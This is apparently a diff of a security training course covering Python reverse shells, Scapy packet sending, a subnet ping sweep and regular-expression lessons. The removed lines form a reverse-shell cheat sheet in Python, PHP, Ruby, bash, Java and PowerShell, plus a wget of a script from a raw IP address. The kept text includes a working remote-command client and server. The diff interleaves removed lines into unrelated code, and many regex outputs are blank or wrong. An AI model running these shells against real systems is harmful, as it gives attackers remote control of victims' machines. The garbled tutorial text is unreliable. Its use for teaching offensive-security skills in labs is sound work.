1342	-	open(STDERR,">&SOCKET");
1342	+
1343	-	system("/bin/sh -i");
1343	+
1344		break
1345
1346		else:
1347	-	##########
1347	+
1348	-	# Python #
1348	+
1349	-	##########
1349	+
1350
1351		time.sleep(3)
1352
1353	-	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1353	+
1354
1355
1356		----------------------------------------------------------------------
1357	-	#######
1357	+
1358	-	# Php #
1358	+
1359	-	#######
1359	+
1360		- Copy and paste below code into server_HTTP.py on your Ubuntu unit (server):
1361
1362	-	php -r '$sock=fsockopen("127.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
1362	+
1363		---------------------------Paste This-----------------------------------
1364
1365		import BaseHTTPServer
1366	-	########
1366	+
1367	-	# ruby #
1367	+
1368	-	########
1368	+
1369
1370		def do_GET(s):
1371	-	ruby -rsocket -e'f=TCPSocket.open("127.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
1371	+
1372		s.send_response(200)
1373		s.send_header("Content-type", "text/html")
1374		s.end_headers()
1375		s.wfile.write(command)
1376	-	########
1376	+
1377	-	# Java #
1377	+
1378	-	########
1378	+
1379		s.send_response(200)
1380		s.end_headers()
1381	-	r = Runtime.getRuntime()
1381	+
1382	-	p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 \| while read line; do \$line 2>&5 >&5; done"] as String[])
1382	+
1383	-	p.waitFor()
1383	+
1384
1385		if __name__ == '__main__':
1386	-	exec 5<>/dev/tcp/127.0.0.1/1234
1386	+
1387		httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
1388
1389	-	cat <&5 \| while read line; do $line 2>&5 >&5; done
1389	+
1390		httpd.serve_forever()
1391	-	exec 5<>/dev/tcp/127.0.0.1/1234
1391	+
1392		print'[!] Server is terminated'
1393	-	while read line 0<&5; do $line 2>&5 >&5; done
1393	+
1394	-	0<&196;exec 196<>/dev/tcp/127.0.0.1/1234; sh <&196 >&196 2>&196
1394	+
1395		----------------------------------------------------------------------
1396
1397		- run server_HTTP.py on Ubuntu with next command:
1398	-	##############
1398	+
1399	-	# Powershell #
1399	+
1400	-	##############
1400	+
1401		infosecaddicts@ubuntu:~$ sudo python server_HTTP.py
1402
1403	-	powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()}; if ($process.ExitCode -ne $null) {$process.Close()}; exit; };$address = '127.0.0.1'; $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize ;$process = New-Object System.Diagnostics.Process ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' ;$process.StartInfo.RedirectStandardInput = 1 ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0 ;$process.Start() ;$inputstream = $process.StandardInput ;$outputstream = $process.StandardOutput ;Start-Sleep 1 ;$encoding = new-object System.Text.AsciiEncoding ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length) ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup} ;$pos = 0; $i = 1; while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos); $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos); $inputstream.write($string); start-sleep 1; if ($process.ExitCode -ne $null) {ReverseShellClean};else { $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){; $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}; $stream.Write($encoding.GetBytes($out),0,$out.length); $out = $null; $string = $null}} else {ReverseShellClean}};"
1403	+
1404
1405
1406		- on Windows machine run client_http.py
1407
1408		- on Ubuntu you will see that connection is established:
1409
1410		---------------------------Type This-----------------------------------
1411
1412		infosecaddicts@ubuntu:~$ sudo python server_HTTP.py
1413		Shell> dir
1414		----------------------------------------------------------------------
1415
1416		192.168.243.1 - - [25/Sep/2017 12:21:40] "GET / HTTP/1.1" 200 -
1417		192.168.243.1 - - [25/Sep/2017 12:21:40] "POST / HTTP/1.1" 200 -
1418		Volume in drive C has no label.
1419
1420
1421		############################################
1422		# Multi-Threaded Reverse Shell in Python 3 #
1423		############################################
1424
1425
1426		- We'll again create 2 files, one for server and one for client/victim. This code is adjusted to work on python2.7
1427
1428		Copy and paste code from below into server.py file on Ubuntu(server) machine and run it with command python server.py:
1429
1430
1431		Server.py code:
1432		---------------------------Paste This-----------------------------------
1433
1434		import socket
1435		import sys
1436
1437		# Create socket (allows two computers to connect)
1438
1439		def socket_create():
1440		try:
1441		global host
1442		global port
1443		global s
1444		host = ''
1445		port = 9999
1446		s = socket.socket()
1447		except socket.error as msg:
1448		print("Socket creation error: " + str(msg))
1449
1450		# Bind socket to port and wait for connection from client
1451		def socket_bind():
1452		try:
1453		global host
1454		global port
1455		global s
1456		print("Binding socket to port: " + str(port))
1457		s.bind((host,port))
1458		s.listen(5)
1459		except socket.error as msg:
1460		print("Socket binding error: " + str(msg) + "\n" + "Retrying...")
1461		socket_bind()
1462
1463		# Establish a connection with client (socket must be listening for them)
1464		def socket_accept():
1465		conn, address = s.accept()
1466		print("Connection has been established \| " + "IP " + address[0] + " \| Port " + str(address[1]))
1467		send_commands(conn)
1468		conn.close()
1469
1470
1471		# Send commands
1472		def send_commands(conn):
1473		while True:
1474		cmd = raw_input() #input() is changed to raw_input() in order to work on python2.7
1475		if cmd == 'quit':
1476		conn.close()
1477		s.close()
1478		sys.exit()
1479		if len(str.encode(cmd))>0:
1480		conn.send(str.encode(cmd))
1481		client_response = str(conn.recv(1024)) # had issue with encoding and I have removed utf-8 from client_response = str(conn.recv(1024),"utf-8")
1482		print(client_response)
1483
1484		# References for str.encode/decode
1485		# https://www.tutorialspoint.com/python/string_encode.htm
1486		# https://www.tutorialspoint.com/python/string_decode.htm
1487
1488
1489		def main():
1490		socket_create()
1491		socket_bind()
1492		socket_accept()
1493
1494		main()
1495
1496
1497
1498		----------------------------------------------------------------------
1499
1500
1501		-After you have aleady run server.py on Ubuntu, you can then run client.py file from Windows(client) unit. Code is below:
1502
1503		Client.py code:
1504
1505		---------------------------Paste This-----------------------------------
1506
1507		import os
1508		import socket
1509		import subprocess
1510
1511		s = socket.socket()
1512		host = '192.168.243.150' # change to IP address of your server
1513		port = 9999
1514		s.connect((host, port))
1515
1516		while True:
1517		data = s.recv(1024)
1518		if data[:2].decode("utf-8") == 'cd':
1519		os.chdir(data[3:].decode("utf-8"))
1520		if len(data) > 0:
1521		cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
1522		output_bytes = cmd.stdout.read() + cmd.stderr.read()
1523		output_str = str(output_bytes) # had issue with encoding, in origin code is output_str = str(output_bytes, "utf-8")
1524		s.send(str.encode(output_str + str(os.getcwd()) + '> '))
1525		print(output_str)
1526		# References for str.encode/decode
1527		# https://www.tutorialspoint.com/python/string_encode.htm
1528		# https://www.tutorialspoint.com/python/string_decode.htm
1529
1530		# Close connection
1531		s.close()
1532
1533
1534		----------------------------------------------------------------------
1535
1536		---------------------------Type This-----------------------------------
1537
1538		python client.py
1539		----------------------------------------------------------------------
1540
1541		- Then return back to Ubuntu and you will see that connection is established and you can run commands from shell.
1542
1543		---------------------------Type This-----------------------------------
1544
1545		infosecaddicts@ubuntu:~$ python server.py
1546
1547		----------------------------------------------------------------------
1548
1549		Binding socket to port: 9999
1550		Connection has been established \| IP 192.168.243.1 \| Port 57779
1551		dir
1552		Volume in drive C has no label.
1553
1554
1555		Directory of C:\Python27
1556
1557
1558
1559
1560
1561
1562
1563
1564
1565
1566
1567		###############################
1568		# Lesson 21: Installing Scapy #
1569		###############################
1570
1571		---------------------------Type This-----------------------------------
1572
1573		sudo apt-get update
1574		sudo apt-get install python-scapy python-pyx python-gnuplot
1575
1576		----------------------------------------------------------------------
1577
1578		Reference Page For All Of The Commands We Will Be Running:
1579		http://samsclass.info/124/proj11/proj17-scapy.html
1580
1581		Great slides for Scapy:
1582		http://www.secdev.org/conf/scapy_csw05.pdf
1583
1584
1585
1586
1587		To run Sapy interactively
1588		---------------------------Type This-----------------------------------
1589
1590		sudo scapy
1591
1592		----------------------------------------------------------------------
1593
1594
1595		################################################
1596		# Lesson 22: Sending ICMPv4 Packets with scapy #
1597		################################################
1598
1599		In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
1600
1601		---------------------------Type This-----------------------------------
1602
1603		i = IP()
1604
1605		----------------------------------------------------------------------
1606
1607
1608
1609		This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
1610
1611		---------------------------Type This-----------------------------------
1612
1613		i.display()
1614
1615		----------------------------------------------------------------------
1616
1617
1618
1619		Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
1620
1621		---------------------------Type This-----------------------------------
1622
1623		i.dst="10.65.75.49"
1624
1625		i.display()
1626
1627
1628		----------------------------------------------------------------------
1629
1630
1631		Notice that scapy automatically fills in your machine's source IP address.
1632
1633		Use these commands to create an object named ic of type ICMP and display its properties:
1634
1635		---------------------------Type This-----------------------------------
1636
1637		ic = ICMP()
1638
1639		ic.display()
1640
1641
1642		----------------------------------------------------------------------
1643
1644
1645
1646		Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
1647
1648		---------------------------Type This-----------------------------------
1649
1650		sr1(i/ic)
1651
1652		----------------------------------------------------------------------
1653
1654
1655
1656
1657		This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.
1658
1659		The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
1660
1661		Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
1662
1663		---------------------------Type This-----------------------------------
1664
1665		sr1(i/ic/"YOUR NAME")
1666
1667		----------------------------------------------------------------------
1668
1669		You should see a reply with a Raw section containing your name.
1670
1671
1672
1673		##############################################
1674		# Lesson 23: Sending a UDP Packet with Scapy #
1675		##############################################
1676
1677
1678		Preparing the Target
1679
1680		---------------------------Type This-----------------------------------
1681
1682		$ ncat -ulvp 4444
1683
1684		----------------------------------------------------------------------
1685
1686
1687
1688		--open another terminal--
1689		In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
1690
1691		---------------------------Type This-----------------------------------
1692
1693
1694		u = UDP()
1695
1696		u.display()
1697
1698		----------------------------------------------------------------------
1699
1700
1701		This creates an object named u of type UDP, and displays its properties.
1702
1703		Execute these commands to change the destination port to 4444 and display the properties again:
1704
1705		---------------------------Type This-----------------------------------
1706
1707		i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
1708
1709		u.dport = 4444
1710
1711		u.display()
1712
1713		----------------------------------------------------------------------
1714
1715
1716		Execute this command to send the packet to the Windows machine:
1717
1718		---------------------------Type This-----------------------------------
1719
1720		send(i/u/"YOUR NAME SENT VIA UDP\n")
1721
1722		----------------------------------------------------------------------
1723
1724
1725		On the Windows target, you should see the message appear
1726
1727
1728
1729
1730		#######################################
1731		# Lesson 24: Ping Sweeping with Scapy #
1732		#######################################
1733
1734		---------------------------Paste This-----------------------------------
1735
1736
1737		#!/usr/bin/python
1738		from scapy.all import *
1739
1740		TIMEOUT = 2
1741		conf.verb = 0
1742		for ip in range(0, 256):
1743		packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
1744		# You will need to change 10.10.30 above this line to the subnet for your network
1745		reply = sr1(packet, timeout=TIMEOUT)
1746		if not (reply is None):
1747		print reply.dst, "is online"
1748		else:
1749		print "Timeout waiting for %s" % packet[IP].dst
1750
1751		----------------------------------------------------------------------
1752
1753
1754		###############################################
1755		# Checking out some scapy based port scanners #
1756		###############################################
1757
1758		---------------------------Type This-----------------------------------
1759
1760		wget https://s3.amazonaws.com/infosecaddictsfiles/rdp_scan.py
1761
1762		cat rdp_scan.py
1763
1764		sudo python rdp_scan.py
1765
1766		----------------------------------------------------------------------
1767
1768		######################################
1769		# Dealing with conf.verb=0 NameError #
1770		######################################
1771
1772		---------------------------Type This-----------------------------------
1773
1774		conf.verb = 0
1775		NameError: name 'conf' is not defined
1776
1777		Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
1778
1779		from scapy import *
1780		to
1781		from scapy.all import *
1782		-----------------------------------------------------------------------
1783
1784
1785
1786		Reference:
1787		http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
1788
1789
1790		conf.verb=0 is a verbosity setting (configuration/verbosity = conv
1791
1792
1793
1794		Here are some good Scapy references:
1795		http://www.secdev.org/projects/scapy/doc/index.html
1796		http://resources.infosecinstitute.com/port-scanning-using-scapy/
1797		http://www.hackerzvoice.net/ouah/blackmagic.txt
1798		http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
1799	-	To run Scapy interactively
1799	+
1800
1801
1802
1803
1804
1805
1806
1807
1808
1809
1810
1811		##################################
1812		# Lesson 25: Regular Expressions #
1813		##################################
1814
1815
1816
1817		**************************************************
1818		* What is Regular Expression and how is it used? *
1819		**************************************************
1820
1821
1822		Simply put, regular expression is a sequence of character(s) mainly used to find and replace patterns in a string or file.
1823
1824
1825		Regular expressions use two types of characters:
1826
1827		a) Meta characters: As the name suggests, these characters have a special meaning, similar to * in wildcard.
1828
1829		b) Literals (like a,b,1,2…)
1830
1831
1832		In Python, we have module "re" that helps with regular expressions. So you need to import library re before you can use regular expressions in Python.
1833
1834
1835		Use this code --> import re
1836
1837
1838
1839
1840		The most common uses of regular expressions are:
1841		--------------------------------------------------
1842
1843		- Search a string (search and match)
1844		- Finding a string (findall)
1845		- Break string into a sub strings (split)
1846		- Replace part of a string (sub)
1847
1848
1849
1850		Let's look at the methods that library "re" provides to perform these tasks.
1851
1852
1853
1854		****************************************************
1855		* What are various methods of Regular Expressions? *
1856		****************************************************
1857
1858
1859		The ‘re' package provides multiple methods to perform queries on an input string. Here are the most commonly used methods, I will discuss:
1860
1861		re.match()
1862		re.search()
1863		re.findall()
1864		re.split()
1865		re.sub()
1866		re.compile()
1867
1868		Let's look at them one by one.
1869
1870
1871		re.match(pattern, string):
1872		-------------------------------------------------
1873
1874		This method finds match if it occurs at start of the string. For example, calling match() on the string ‘AV Analytics AV' and looking for a pattern ‘AV' will match. However, if we look for only Analytics, the pattern will not match. Let's perform it in python now.
1875
1876		Code
1877		---------------------------Type This-----------------------------------
1878
1879		import re
1880		result = re.match(r'AV', 'AV Analytics ESET AV')
1881		print result
1882		----------------------------------------------------------------------
1883
1884		Output:
1885		<_sre.SRE_Match object at 0x0000000009BE4370>
1886
1887		Above, it shows that pattern match has been found. To print the matching string we'll use method group (It helps to return the matching string). Use "r" at the start of the pattern string, it designates a python raw string.
1888
1889		---------------------------Type This-----------------------------------
1890
1891		result = re.match(r'AV', 'AV Analytics ESET AV')
1892		print result.group(0)
1893		----------------------------------------------------------------------
1894
1895		Output:
1896		AV
1897
1898
1899		Let's now find ‘Analytics' in the given string. Here we see that string is not starting with ‘AV' so it should return no match. Let's see what we get:
1900
1901
1902		Code
1903		---------------------------Type This-----------------------------------
1904
1905		result = re.match(r'Analytics', 'AV Analytics ESET AV')
1906		print result
1907		----------------------------------------------------------------------
1908
1909
1910		Output:
1911		None
1912
1913
1914		There are methods like start() and end() to know the start and end position of matching pattern in the string.
1915
1916		Code
1917		---------------------------Type This-----------------------------------
1918
1919		result = re.match(r'AV', 'AV Analytics ESET AV')
1920		print result.start()
1921		print result.end()
1922		----------------------------------------------------------------------
1923
1924		Output:
1925		0
1926		2
1927
1928		Above you can see that start and end position of matching pattern ‘AV' in the string and sometime it helps a lot while performing manipulation with the string.
1929
1930
1931
1932
1933
1934		re.search(pattern, string):
1935		-----------------------------------------------------
1936
1937
1938		It is similar to match() but it doesn't restrict us to find matches at the beginning of the string only. Unlike previous method, here searching for pattern ‘Analytics' will return a match.
1939
1940		Code
1941		---------------------------Type This-----------------------------------
1942
1943		result = re.search(r'Analytics', 'AV Analytics ESET AV')
1944		print result.group(0)
1945		----------------------------------------------------------------------
1946
1947		Output:
1948		Analytics
1949
1950		Here you can see that, search() method is able to find a pattern from any position of the string but it only returns the first occurrence of the search pattern.
1951
1952
1953
1954
1955
1956
1957		re.findall (pattern, string):
1958		------------------------------------------------------
1959
1960
1961		It helps to get a list of all matching patterns. It has no constraints of searching from start or end. If we will use method findall to search ‘AV' in given string it will return both occurrence of AV. While searching a string, I would recommend you to use re.findall() always, it can work like re.search() and re.match() both.
1962
1963
1964		Code
1965		---------------------------Type This-----------------------------------
1966
1967		result = re.findall(r'AV', 'AV Analytics ESET AV')
1968		print result
1969		----------------------------------------------------------------------
1970
1971		Output:
1972	-	wget http://45.63.104.73/rdp_scan.py
1972	+
1973
1974
1975
1976
1977
1978		re.split(pattern, string, [maxsplit=0]):
1979		------------------------------------------------------
1980
1981
1982
1983		This methods helps to split string by the occurrences of given pattern.
1984
1985
1986		Code
1987		---------------------------Type This-----------------------------------
1988
1989		result=re.split(r'y','Analytics')
1990		result
1991		----------------------------------------------------------------------
1992
1993		Output:
1994		[]
1995
1996		Above, we have split the string "Analytics" by "y". Method split() has another argument "maxsplit". It has default value of zero. In this case it does the maximum splits that can be done, but if we give value to maxsplit, it will split the string. Let's look at the example below:
1997
1998
1999		Code
2000		---------------------------Type This-----------------------------------
2001
2002		result=re.split(r's','Analytics eset')
2003		print result
2004		----------------------------------------------------------------------
2005
2006		Output:
2007		['Analytic', ' e', 'et'] #It has performed all the splits that can be done by pattern "s".
2008
2009
2010
2011		Code
2012		---------------------------Type This-----------------------------------
2013
2014		result=re.split(r's','Analytics eset',maxsplit=1)
2015		result
2016		----------------------------------------------------------------------
2017
2018		Output:
2019		[]
2020
2021
2022
2023	-	#######################
2023	+
2024	-	# Regular Expressions #
2024	+
2025	-	#######################
2025	+
2026		----------------------------------------------------------
2027
2028		It helps to search a pattern and replace with a new sub string. If the pattern is not found, string is returned unchanged.
2029
2030		Code
2031		---------------------------Type This-----------------------------------
2032
2033		result=re.sub(r'Ruby','Python','Joe likes Ruby')
2034		result
2035		----------------------------------------------------------------------
2036
2037		Output:
2038		''
2039
2040
2041
2042
2043
2044		re.compile(pattern, repl, string):
2045		----------------------------------------------------------
2046
2047
2048		We can combine a regular expression pattern into pattern objects, which can be used for pattern matching. It also helps to search a pattern again without rewriting it.
2049
2050
2051		Code
2052		---------------------------Type This-----------------------------------
2053
2054		import re
2055		pattern=re.compile('XSS')
2056		result=pattern.findall('XSS is Cross Site Scripting, XSS')
2057		print result
2058		result2=pattern.findall('XSS is Cross Site Scripting, SQLi is Sql Injection')
2059		print result2
2060		----------------------------------------------------------------------
2061
2062		Output:
2063		['XSS', 'XSS']
2064		['XSS']
2065
2066		Till now, we looked at various methods of regular expression using a constant pattern (fixed characters). But, what if we do not have a constant search pattern and we want to return specific set of characters (defined by a rule) from a string? Don't be intimidated.
2067
2068		This can easily be solved by defining an expression with the help of pattern operators (meta and literal characters). Let's look at the most common pattern operators.
2069
2070
2071
2072
2073		############################################
2074		# Lesson 26: Regular Expressions operators #
2075		############################################
2076
2077		**********************************************
2078		* What are the most commonly used operators? *
2079		**********************************************
2080
2081
2082		Regular expressions can specify patterns, not just fixed characters. Here are the most commonly used operators that helps to generate an expression to represent required characters in a string or file. It is commonly used in web scrapping and text mining to extract required information.
2083
2084		Operators Description
2085		. Matches with any single character except newline ‘\n'.
2086		? match 0 or 1 occurrence of the pattern to its left
2087		+ 1 or more occurrences of the pattern to its left
2088		* 0 or more occurrences of the pattern to its left
2089		\w Matches with a alphanumeric character whereas \W (upper case W) matches non alphanumeric character.
2090		\d Matches with digits [0-9] and /D (upper case D) matches with non-digits.
2091		\s Matches with a single white space character (space, newline, return, tab, form) and \S (upper case S) matches any non-white space character.
2092		\b boundary between word and non-word and /B is opposite of /b
2093		[..] Matches any single character in a square bracket and [^..] matches any single character not in square bracket
2094		\ It is used for special meaning characters like \. to match a period or \+ for plus sign.
2095		^ and $ ^ and $ match the start or end of the string respectively
2096		{n,m} Matches at least n and at most m occurrences of preceding expression if we write it as {,m} then it will return at least any minimum occurrence to max m preceding expression.
2097		a\| b Matches either a or b
2098		( ) Groups regular expressions and returns matched text
2099		\t, \n, \r Matches tab, newline, return
2100
2101
2102		For more details on meta characters "(", ")","\|" and others details , you can refer this link (https://docs.python.org/2/library/re.html).
2103
2104		Now, let's understand the pattern operators by looking at the below examples.
2105
2106
2107
2108		****************************************
2109		* Some Examples of Regular Expressions *
2110		****************************************
2111
2112		******************************************************
2113		* Problem 1: Return the first word of a given string *
2114		******************************************************
2115
2116
2117		Solution-1 Extract each character (using "\w")
2118		---------------------------------------------------------------------------
2119
2120		Code
2121		---------------------------Type This-----------------------------------
2122
2123		import re
2124		result=re.findall(r'.','Python is the best scripting language')
2125		print result
2126		----------------------------------------------------------------------
2127
2128		Output:
2129		['P', 'y', 't', 'h', 'o', 'n', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'b', 'e', 's', 't', ' ', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', ' ', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
2130
2131
2132		Above, space is also extracted, now to avoid it use "\w" instead of ".".
2133
2134
2135		Code
2136		---------------------------Type This-----------------------------------
2137
2138		result=re.findall(r'\w','Python is the best scripting language')
2139		print result
2140		----------------------------------------------------------------------
2141
2142		Output:
2143		['P', 'y', 't', 'h', 'o', 'n', 'i', 's', 't', 'h', 'e', 'b', 'e', 's', 't', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
2144
2145
2146
2147
2148		Solution-2 Extract each word (using "*" or "+")
2149		---------------------------------------------------------------------------
2150
2151		Code
2152		---------------------------Type This-----------------------------------
2153
2154		result=re.findall(r'\w*','Python is the best scripting language')
2155		print result
2156		----------------------------------------------------------------------
2157
2158		Output:
2159		['Python', '', 'is', '', 'the', '', 'best', '', 'scripting', '', 'language', '']
2160
2161
2162		Again, it is returning space as a word because "*" returns zero or more matches of pattern to its left. Now to remove spaces we will go with "+".
2163
2164		Code
2165		---------------------------Type This-----------------------------------
2166
2167		result=re.findall(r'\w+','Python is the best scripting language')
2168		print result
2169		----------------------------------------------------------------------
2170
2171		Output:
2172		['Python', 'is', 'the', 'best', 'scripting', 'language']
2173
2174
2175
2176
2177		Solution-3 Extract each word (using "^")
2178		-------------------------------------------------------------------------------------
2179
2180
2181		Code
2182		---------------------------Type This-----------------------------------
2183
2184		result=re.findall(r'^\w+','Python is the best scripting language')
2185		print result
2186		----------------------------------------------------------------------
2187
2188		Output:
2189		['Python']
2190
2191		If we will use "$" instead of "^", it will return the word from the end of the string. Let's look at it.
2192
2193		Code
2194		---------------------------Type This-----------------------------------
2195
2196		result=re.findall(r'\w+$','Python is the best scripting language')
2197		print result
2198		----------------------------------------------------------------------
2199
2200		Output:
2201		[‘language']
2202
2203
2204
2205
2206	-	['Anal', 'tics']
2206	+
2207		**********************************************************
2208		* Problem 2: Return the first two character of each word *
2209		**********************************************************
2210
2211
2212
2213
2214		Solution-1 Extract consecutive two characters of each word, excluding spaces (using "\w")
2215		------------------------------------------------------------------------------------------------------
2216
2217		Code
2218		---------------------------Type This-----------------------------------
2219
2220		result=re.findall(r'\w\w','Python is the best')
2221		print result
2222		----------------------------------------------------------------------
2223
2224		Output:
2225		['Py', 'th', 'on', 'is', 'th', 'be', 'st']
2226
2227
2228
2229
2230
2231		Solution-2 Extract consecutive two characters those available at start of word boundary (using "\b")
2232		------------------------------------------------------------------------------------------------------
2233
2234		Code
2235		---------------------------Type This-----------------------------------
2236
2237		result=re.findall(r'\b\w.','Python is the best')
2238		print result
2239		----------------------------------------------------------------------
2240
2241		Output:
2242		['Py', 'is', 'th', 'be']
2243
2244
2245
2246
2247
2248
2249		********************************************************
2250		* Problem 3: Return the domain type of given email-ids *
2251		********************************************************
2252
2253
2254		To explain it in simple manner, I will again go with a stepwise approach:
2255
2256
2257
2258
2259
2260		Solution-1 Extract all characters after "@"
2261		------------------------------------------------------------------------------------------------------------------
2262
2263		Code
2264		---------------------------Type This-----------------------------------
2265
2266		result=re.findall(r'@\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
2267		print result
2268		----------------------------------------------------------------------
2269
2270		Output: ['@gmail', '@test', '@strategicsec', '@rest']
2271
2272
2273
2274		Above, you can see that ".com", ".biz" part is not extracted. To add it, we will go with below code.
2275
2276		---------------------------Type This-----------------------------------
2277
2278		result=re.findall(r'@\w+.\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
2279		print result
2280		----------------------------------------------------------------------
2281
2282		Output:
2283		['@gmail.com', '@test.com', '@strategicsec.com', '@rest.biz']
2284
2285
2286
2287
2288
2289
2290		Solution – 2 Extract only domain name using "( )"
2291		-----------------------------------------------------------------------------------------------------------------------
2292
2293
2294		Code
2295		---------------------------Type This-----------------------------------
2296
2297		result=re.findall(r'@\w+.(\w+)','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
2298		print result
2299		----------------------------------------------------------------------
2300
2301		Output:
2302		['com', 'com', 'com', 'biz']
2303
2304
2305
2306
2307
2308
2309		********************************************
2310		* Problem 4: Return date from given string *
2311		********************************************
2312
2313
2314		Here we will use "\d" to extract digit.
2315
2316
2317		Solution:
2318		----------------------------------------------------------------------------------------------------------------------
2319
2320		Code
2321		---------------------------Type This-----------------------------------
2322
2323		result=re.findall(r'\d{2}-\d{2}-\d{4}','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
2324		print result
2325		----------------------------------------------------------------------
2326
2327		Output:
2328		['12-05-2007', '11-11-2016', '12-01-2009']
2329
2330		If you want to extract only year again parenthesis "( )" will help you.
2331
2332
2333		Code
2334
2335		---------------------------Type This-----------------------------------
2336
2337		result=re.findall(r'\d{2}-\d{2}-(\d{4})','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
2338		print result
2339		----------------------------------------------------------------------
2340
2341		Output:
2342		['2007', '2016', '2009']
2343
2344
2345
2346
2347
2348		*******************************************************************
2349		* Problem 5: Return all words of a string those starts with vowel *
2350		*******************************************************************
2351
2352
2353
2354
2355		Solution-1 Return each words
2356		-----------------------------------------------------------------------------------------------------------------
2357
2358		Code
2359		---------------------------Type This-----------------------------------
2360
2361		result=re.findall(r'\w+','Python is the best')
2362		print result
2363		----------------------------------------------------------------------
2364
2365		Output:
2366		['Python', 'is', 'the', 'best']
2367
2368
2369
2370
2371
2372		Solution-2 Return words starts with alphabets (using [])
2373		------------------------------------------------------------------------------------------------------------------
2374
2375		Code
2376		---------------------------Type This-----------------------------------
2377
2378		result=re.findall(r'[aeiouAEIOU]\w+','I love Python')
2379		print result
2380		----------------------------------------------------------------------
2381
2382		Output:
2383		['ove', 'on']
2384
2385		Above you can see that it has returned "ove" and "on" from the mid of words. To drop these two, we need to use "\b" for word boundary.
2386
2387
2388
2389
2390
2391		Solution- 3
2392		------------------------------------------------------------------------------------------------------------------
2393
2394		Code
2395		---------------------------Type This-----------------------------------
2396
2397		result=re.findall(r'\b[aeiouAEIOU]\w+','I love Python')
2398		print result
2399		----------------------------------------------------------------------
2400
2401		Output:
2402		[]
2403
2404		In similar ways, we can extract words those starts with constant using "^" within square bracket.
2405
2406
2407		Code
2408		---------------------------Type This-----------------------------------
2409
2410		result=re.findall(r'\b[^aeiouAEIOU]\w+','I love Python')
2411		print result
2412		----------------------------------------------------------------------
2413
2414		Output:
2415		[' love', ' Python']
2416
2417		Above you can see that it has returned words starting with space. To drop it from output, include space in square bracket[].
2418
2419
2420		Code
2421		---------------------------Type This-----------------------------------
2422
2423		result=re.findall(r'\b[^aeiouAEIOU ]\w+','I love Python')
2424		print result
2425		----------------------------------------------------------------------
2426
2427		Output:
2428		['love', 'Python']
2429
2430
2431
2432
2433
2434
2435		*************************************************************************************************
2436		* Problem 6: Validate a phone number (phone number must be of 10 digits and starts with 8 or 9) *
2437		*************************************************************************************************
2438
2439
2440		We have a list phone numbers in list "li" and here we will validate phone numbers using regular
2441
2442
2443
2444
2445		Solution
2446		-------------------------------------------------------------------------------------------------------------------------------------
2447
2448
2449		Code
2450		---------------------------Type This-----------------------------------
2451
2452		import re
2453		li=['9999999999','999999-999','99999x9999']
2454		for val in li:
2455		if re.match(r'[8-9]{1}[0-9]{9}',val) and len(val) == 10:
2456		print 'yes'
2457		else:
2458		print 'no'
2459
2460		----------------------------------------------------------------------
2461
2462		Output:
2463		yes
2464		no
2465		no
2466
2467
2468
2469
2470
2471		******************************************************
2472		* Problem 7: Split a string with multiple delimiters *
2473		******************************************************
2474
2475
2476
2477		Solution
2478		---------------------------------------------------------------------------------------------------------------------------
2479
2480
2481		Code
2482		---------------------------Type This-----------------------------------
2483
2484		import re
2485		line = 'asdf fjdk;afed,fjek,asdf,foo' # String has multiple delimiters (";",","," ").
